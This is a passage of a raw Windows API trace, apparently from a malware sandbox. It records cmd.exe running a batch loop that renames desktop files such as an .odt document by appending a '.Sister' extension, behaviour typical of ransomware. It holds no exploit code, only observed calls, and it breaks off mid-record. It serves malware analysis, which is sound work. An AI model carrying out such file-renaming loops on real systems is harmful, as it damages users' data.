nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0143.620] malloc (_Size=0x1ff9c) returned 0x21ed913fef0 [0143.620] ??_V@YAXPEAX@Z () returned 0x21ed913fef0 [0143.621] GetProcessHeap () returned 0x21ed8c70000 [0143.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d448b0 [0143.621] ??_V@YAXPEAX@Z () returned 0x1 [0143.621] ??_V@YAXPEAX@Z () returned 0x1 [0143.623] GetProcessHeap () returned 0x21ed8c70000 [0143.623] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60910, Size=0x490) returned 0x21ed8d60910 [0143.623] GetProcessHeap () returned 0x21ed8c70000 [0143.623] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60910) returned 0x490 [0143.623] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0143.623] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.623] GetFileType (hFile=0x50) returned 0x2 [0143.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.624] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0143.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.631] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0143.643] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.643] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0143.643] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0143.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.643] GetFileType (hFile=0x50) returned 0x2 [0143.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.643] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0143.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.675] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0143.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.703] GetFileType (hFile=0x50) returned 0x2 [0143.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.703] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0143.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.712] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d608e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d608e0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0143.720] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0143.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.720] GetFileType (hFile=0x50) returned 0x2 [0143.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.720] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0143.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.723] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0143.731] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0143.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.731] GetFileType (hFile=0x50) returned 0x2 [0143.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.731] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0143.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.780] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0143.809] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0143.817] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0143.817] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0143.818] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.818] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.819] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0143.819] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0143.819] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0143.819] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0143.819] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0143.819] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0143.819] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0143.819] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0143.819] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0143.819] ??_V@YAXPEAX@Z () returned 0x1 [0143.819] GetProcessHeap () returned 0x21ed8c70000 [0143.819] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d45510 [0143.819] GetProcessHeap () returned 0x21ed8c70000 [0143.819] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45510, Size=0x130) returned 0x21ed8d45510 [0143.819] GetProcessHeap () returned 0x21ed8c70000 [0143.819] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45510) returned 0x130 [0143.819] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.820] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.820] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.820] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed911ff40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.821] ??_V@YAXPEAX@Z () returned 0x1 [0143.821] GetProcessHeap () returned 0x21ed8c70000 [0143.821] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d45650 [0143.821] GetProcessHeap () returned 0x21ed8c70000 [0143.821] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d45790 [0143.821] GetProcessHeap () returned 0x21ed8c70000 [0143.821] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45790, Size=0x130) returned 0x21ed8d45790 [0143.821] GetProcessHeap () returned 0x21ed8c70000 [0143.821] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45790) returned 0x130 [0143.822] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.822] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.822] GetProcessHeap () returned 0x21ed8c70000 [0143.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d438d0 [0143.822] GetProcessHeap () returned 0x21ed8c70000 [0143.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b040 [0143.822] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0143.822] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0143.822] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0143.822] GetLastError () returned 0x2 [0143.822] GetProcessHeap () returned 0x21ed8c70000 [0143.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93311d0 [0143.822] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93311e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.822] SetErrorMode (uMode=0x0) returned 0x0 [0143.822] SetErrorMode (uMode=0x1) returned 0x0 [0143.822] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0143.823] SetErrorMode (uMode=0x0) returned 0x1 [0143.823] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0143.823] GetProcessHeap () returned 0x21ed8c70000 [0143.823] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c150 [0143.823] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0143.823] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0143.823] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0143.823] GetLastError () returned 0x2 [0143.823] ??_V@YAXPEAX@Z () returned 0x1 [0143.823] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.823] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.823] malloc (_Size=0xffce) returned 0x21ed912ff20 [0143.824] ??_V@YAXPEAX@Z () returned 0x21ed912ff20 [0143.824] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0143.970] GetLastError () returned 0x2 [0143.970] _get_osfhandle (_FileHandle=2) returned 0x54 [0143.970] GetFileType (hFile=0x54) returned 0x2 [0143.970] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0143.971] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0143.974] _get_osfhandle (_FileHandle=2) returned 0x54 [0143.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0143.983] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0143.983] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0143.983] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0143.990] longjmp () [0143.990] ??_V@YAXPEAX@Z () returned 0x1 [0143.990] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="GQcSsii2kuOdN456.odt", cAlternateFileName="")) returned 1 [0143.990] GetProcessHeap () returned 0x21ed8c70000 [0143.990] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45250, Size=0x206) returned 0x21ed8d458d0 [0143.990] GetProcessHeap () returned 0x21ed8c70000 [0143.990] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d458d0) returned 0x206 [0143.990] GetProcessHeap () returned 0x21ed8c70000 [0143.990] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93411c0 [0143.991] GetProcessHeap () returned 0x21ed8c70000 [0143.991] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93411c0, Size=0x30) returned 0x21ed93411c0 [0143.991] GetProcessHeap () returned 0x21ed8c70000 [0143.991] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93411c0) returned 0x30 [0143.991] GetProcessHeap () returned 0x21ed8c70000 [0143.991] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9341200 [0143.991] malloc (_Size=0x1ff9c) returned 0x21ed913ff00 [0143.993] GetProcessHeap () returned 0x21ed8c70000 [0143.993] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bc60 [0143.993] ??_V@YAXPEAX@Z () returned 0x1 [0143.994] GetProcessHeap () returned 0x21ed8c70000 [0143.994] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9341200, Size=0x1c0) returned 0x21ed9341200 [0143.994] GetProcessHeap () returned 0x21ed8c70000 [0143.994] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9341200) returned 0x1c0 [0143.994] GetProcessHeap () returned 0x21ed8c70000 [0143.994] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93413d0 [0143.994] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93413d0, Size=0x290) returned 0x21ed93413d0 [0143.995] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93413d0) returned 0x290 [0143.995] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9341670 [0143.995] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9341670, Size=0x30) returned 0x21ed9341670 [0143.995] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9341670) returned 0x30 [0143.995] GetProcessHeap () returned 0x21ed8c70000 [0143.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93416b0 [0143.995] malloc (_Size=0x1ff9c) returned 0x21ed913ff00 [0143.997] GetProcessHeap () returned 0x21ed8c70000 [0143.997] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bee0 [0143.997] ??_V@YAXPEAX@Z () returned 0x1 [0143.998] malloc (_Size=0x1ff9c) returned 0x21ed913ff00 [0144.001] GetFullPathNameW (in: lpFileName="GQcSsii2kuOdN456.odt", nBufferLength=0xffce, lpBuffer=0x21ed913ff00, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt", lpFilePart=0xa6cf4fe1c8*="GQcSsii2kuOdN456.odt") returned 0x2c [0144.001] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42bb0 [0144.002] FindClose (in: hFindFile=0x21ed8d42bb0 | out: hFindFile=0x21ed8d42bb0) returned 1 [0144.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42d90 [0144.002] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0144.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8033f30a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8033f30a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d432d0 [0144.002] FindClose (in: hFindFile=0x21ed8d432d0 | out: hFindFile=0x21ed8d432d0) returned 1 [0144.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0x4, dwReserved1=0x80, cFileName="GQcSsii2kuOdN456.odt", cAlternateFileName="GQCSSI~1.ODT")) returned 0x21ed8d43030 [0144.002] FindClose (in: hFindFile=0x21ed8d43030 | out: hFindFile=0x21ed8d43030) returned 1 [0144.002] _wcsnicmp (_String1="GQCSSI~1.ODT", _String2="GQcSsii2kuOdN456.odt", _MaxCount=0x14) returned 21 [0144.002] malloc (_Size=0x1ff9c) returned 0x21ed915feb0 [0144.003] ??_V@YAXPEAX@Z () returned 0x21ed915feb0 [0144.004] GetProcessHeap () returned 0x21ed8c70000 [0144.004] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8c50 [0144.004] ??_V@YAXPEAX@Z () returned 0x1 [0144.004] ??_V@YAXPEAX@Z () returned 0x1 [0144.005] GetProcessHeap () returned 0x21ed8c70000 [0144.005] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93416b0, Size=0x1c0) returned 0x21ed93416b0 [0144.005] GetProcessHeap () returned 0x21ed8c70000 [0144.005] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93416b0) returned 0x1c0 [0144.005] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0144.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.006] GetFileType (hFile=0x50) returned 0x2 [0144.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.006] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0144.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.007] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0144.051] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.051] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0144.051] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0144.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.051] GetFileType (hFile=0x50) returned 0x2 [0144.051] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.051] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0144.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.073] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0144.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.080] GetFileType (hFile=0x50) returned 0x2 [0144.080] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.080] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.143] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93411d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93411d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.152] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"GQcSsii2kuOdN456.odt\" \"GQcSsii2kuOdN456.odt.Sister\" ") returned 54 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x2 [0144.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.152] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0144.184] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x2 [0144.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.184] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.187] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.188] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0144.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.188] GetFileType (hFile=0x50) returned 0x2 [0144.188] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.188] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.190] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0144.196] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0144.196] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.196] GetFileType (hFile=0x50) returned 0x2 [0144.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.196] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.197] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.197] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: 